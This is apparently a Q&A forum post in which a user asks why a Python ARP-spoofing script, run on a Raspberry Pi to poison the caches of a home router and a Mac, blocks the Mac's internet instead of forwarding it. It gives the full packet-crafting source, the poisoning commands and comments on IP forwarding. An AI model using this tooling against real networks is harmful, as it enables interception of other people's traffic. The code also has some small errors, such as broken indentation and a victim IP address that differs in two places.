# Python ARP spoofing doesn't forward packet, just blocks internet

Tags: python, arp

I downloaded a python program that emulates the arpspoof tool for my raspberry pi so I could see better how it works and change it up as I want. Before I tell the problem, here are the devices on my network:
Router: 
 
IP: 192.168.7.1
MAC: 14:22:db:a6:0c:ed
Raspberry Pi (spoofer):
IP: 192.168.7.35
MAC: 00:0f:60:01:c2:ca
Mac (victim):
IP: 192.168.7.35
MAC: 28:cf:e9:0b:7f:45

However, it doesn't work. It just blocks the internet for the mac. Here is what I have done:
`sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"` (turns on IP forwarding)
`sudo python arpspoof.py -t 14:22:db:a6:0c:ed 192.168.7.22` (tells the router that the raspberry pi is the mac)
`sudo python arpspoof.py -t 28:cf:e9:0b:7f:45 192.168.7.1` (tells the mac that the raspberry pi is the router)
Again, all this does is cut the internet for the mac. I get the sense that the IP forward wasn't working. Do you guys know what is wrong? Here is the program:

```
import getopt,sys,string
from socket import *
from struct import *
from time import sleep


ETHER_BROADCAST="\xff"*6
ETH_P_ETHER=0x0001
ETH_P_IP=0x0800
ETH_P_ARP=0x0806

def usage():
    print "Usage: %s [-t target] [-i interface] [-s sleep] host"
    print "\t host : host to take over"
    print "\t target : MAC address of a specific target to ARP poison"
    print "\t sleep : time to sleep (in seconds) between two packets"
    sys.exit(1)




def ether(src, dst, type):
    return dst+src+pack("!H",type)

def arp(hw, p, hwlen, plen, op, hwsrc, psrc, hwdst, pdst):
    return pack("!HHBBH", hw, p, hwlen, plen, op) + hwsrc + psrc + hwdst + pdst

def is_at(macsrc,ipsrc):
    return arp(ETH_P_ETHER, ETH_P_IP, 6, 4, 2, 
               macsrc, inet_aton(ipsrc), ETHER_BROADCAST, pack("!I",INADDR_ANY))


def mac2str(a):
    return reduce(str.__add__,map(lambda x: chr(int(x,16)), a.split(":")))

def str2mac(a):
    return "%02x:%02x:%02x:%02x:%02x:%02x" % unpack("!6B",a)

try:
    opts=getopt.getopt(sys.argv[1:], "i:t:s:h")

    target = "\xff\xff\xff\xff\xff\xff"
    dev = "wlan0"
    slptime = 2
    for opt, parm in opts[0]:
        if opt == "-h":
            usage()
        elif opt == "-t":
            target = mac2str(parm) # XXX get mac from IP
        elif opt == "-i":
            dev = parm
        elif opt == "-s":
        try:
                slptime = float(parm)
            except ValueError,msg:
                raise getopt.GetoptError("'sleep' parameter error: "+msg.__repr__(),None)

    if len(opts[1]) == 0 :
        raise getopt.GetoptError("'host' parameter missing",None)
    elif len(opts[1]) > 1 :
        raise getopt.GetoptError("Too many parameters : [%s]" % string.join(opts[1]),None)
    else:
        host = opts[1][0]

    print "dev:", dev
    print "target:", str2mac(target) 
    print "host:", host
except getopt.error, msg:
    print "ERROR:",msg
    usage()
except KeyboardInterrupt:
    print "Interrupted by user"


try:
    s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP))
    s.bind((dev, ETH_P_ARP))
    mymac = s.getsockname()[4] 
    pkt = ether(mymac, target, ETH_P_ARP) + is_at(mymac, host)
    disp = "%s -> %s   %s is-at %s" % (str2mac(mymac), str2mac(target), host, str2mac(mymac))
    while 1:
        s.send(pkt)
    print disp
    sleep(slptime)
except KeyboardInterrupt:
    pass
```

Thank you for your help, it is much appreciated.

Comment: I believe you are misunderstanding the ``-t`` parameter - that would be the host you're redirecting traffic to, not the one you're telling to redirect.  In other words, it should be the RasPi's MAC in both cases.  Also, I'm not sure that ``ip_forward`` will do anything when only a single interface is involved.  I think you'd either need separate subinterfaces for talking to the router and Mac, or explicit iptables FORWARD rules.

Comment: @jasonharper Thank you, could you please tell me how I would use iptables to do that?

Comment: Also, if the "host" is the IP that will get redirected to the raspberry pi, and the "target" is the MAC address of the raspberry pi, how would I tell who to send this arp message to? Because I don't want to tell the mac the the raspberry pi is the mac, or tell the router that the raspberry pi is the router. I want to only tell the mac that the raspberry pi is the router and tell the router that the router that the raspberry pi is the mac. Thanks!

Comment: @jasonharper I'm pretty sure the `-t` parameter actually does tell who to send the packet to. I ran the command `sudo python arpspoof.py -t 28:cf:e9:0b:7f:45 192.168.7.1` and what shows up in Wireshark on the mac is (basically): 
Source: 192.168.7.35 (raspberry pi)
Destination: 28:cf:e9:0b:7f:45 (mac)
192.168.7.1 is at 00:0f:60:01:c2:ca (raspberry pi's mac address)

Which is exactly what I want. Still, I'm having problems with the IP forwarding stuff. Could you help me with that? Thanks.